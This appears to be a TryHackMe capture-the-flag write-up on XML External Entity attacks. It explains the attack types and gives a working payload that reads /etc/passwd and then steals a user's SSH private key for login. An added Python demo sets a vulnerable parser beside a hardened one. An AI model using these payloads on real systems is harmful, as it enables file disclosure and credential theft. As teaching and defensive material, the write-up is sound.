THM — XXE
An XML External Entity (XXE) attack abuses features of XML parsers, specifically the handling of external entities declared in a DTD. It often lets an attacker interact with backend or external systems that the application itself can reach, and read files on the server that the parser's process can access.
There are two types of XXE attack: in-band and out-of-band (OOB-XXE).
1) In an in-band XXE attack the attacker receives an immediate response to the XXE payload: the data the parser fetched is reflected in the application's response.
2) In an out-of-band XXE attack (also called blind XXE) there is no immediate response from the web application, so the attacker has to make the parser send the output of the payload somewhere else, typically to a server they control (for example via an external DTD hosted on that server) or into another file or error message they can read.
What is XML?
XML (eXtensible Markup Language) is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. It is used for storing and transporting data.
DTD
DTD stands for Document Type Definition. A DTD defines the structure and the legal elements and attributes of an XML document. It can be used to validate an XML document and make sure that the file conforms to the rules of that DTD. Entities are also declared in the DTD, including external entities that point at a file or URL, and that declaration is what an XXE payload abuses.
Exploitation
On the left side of the screenshot is the Burp request that was sent with the URL-encoded payload, and on the right side the response shows that the payload successfully displayed the name value.
We can use this payload to read /etc/passwd:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root>
The output shows a user named falcon, so we attempt to steal his private SSH key, located at /home/falcon/.ssh/id_rsa. Pointing the SYSTEM entity at that path returns the key in the response, provided the user the web application runs as can read the file. Save the key to a file, restrict its permissions (chmod 600), and use it with ssh -i to log in as falcon.
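As an added, runnable example (not part of the TryHackMe room or its target application): the payload above fed to a deliberately vulnerable Python xml.sax handler next to its hardened form, so you can see exactly what the server-side parser setting does. It reads a constructed stand-in for /etc/passwd written to a temporary file rather than the real one, and the helper names (build_payload, url_encode_payload, parse_name, run_demo) are this example's own.

```python
"""Added example (not from the TryHackMe room): a minimal backend XML
handler that is vulnerable to in-band XXE, next to the hardened form.
Only the Python standard library (xml.sax) is used; the passwd file is a
constructed stand-in for /etc/passwd so the script runs anywhere."""
import io
import os
import pathlib
import tempfile
import urllib.parse
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample of what /etc/passwd looked like on the target
# (the real file is never read, so this needs no root and no target).
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "falcon:x:1000:1000:falcon:/home/falcon:/bin/bash\n"
)


def build_payload(target_path: str) -> str:
    """Return the in-band XXE payload from the write-up, aimed at target_path.
    The entity 'read' is declared in the internal DTD subset and expanded
    inside <root>, so whatever the parser fetches lands in the response."""
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE root [<!ENTITY read SYSTEM '{target_path}'>]>\n"
        "<root>&read;</root>"
    )


def url_encode_payload(payload: str) -> str:
    """URL-encode the payload, as was done before sending it through Burp."""
    return urllib.parse.quote(payload, safe="")


class TextCollector(ContentHandler):
    """Collects character data; stands in for the app echoing the 'name'."""

    def __init__(self) -> None:
        super().__init__()
        self._parts = []

    def characters(self, content: str) -> None:
        self._parts.append(content)

    @property
    def text(self) -> str:
        return "".join(self._parts)


def parse_name(xml_bytes: bytes, resolve_external_entities: bool) -> str:
    """Parse untrusted XML the way a backend might and return the text it
    would echo back. resolve_external_entities=True is the vulnerable
    setting: xml.sax fetches SYSTEM entities (file://, http://) and inlines
    their content. False is the hardened setting (and Python's default
    since 3.7.1): the external entity is left unexpanded."""
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(feature_external_ges, resolve_external_entities)
    parser.parse(io.BytesIO(xml_bytes))
    return handler.text


def run_demo() -> dict:
    """Write the constructed passwd to a temp file, aim the payload at it
    with a file:// URL, and parse with both settings. Returns both results."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-passwd-")
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(SAMPLE_PASSWD)
        payload = build_payload(pathlib.Path(path).as_uri()).encode()
        return {
            "vulnerable": parse_name(payload, resolve_external_entities=True),
            "hardened": parse_name(payload, resolve_external_entities=False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    results = run_demo()
    print("vulnerable parser returned:\n" + results["vulnerable"])
    print("hardened parser returned: " + repr(results["hardened"]))
```

The same parse_name call with the entity pointed at /home/falcon/.ssh/id_rsa is what the key-theft step relies on; the hardened branch shows the fix is a parser setting, not input filtering, and the entity then expands to nothing rather than raising an error, so a missing value in the response is the sign the target is not vulnerable in this way.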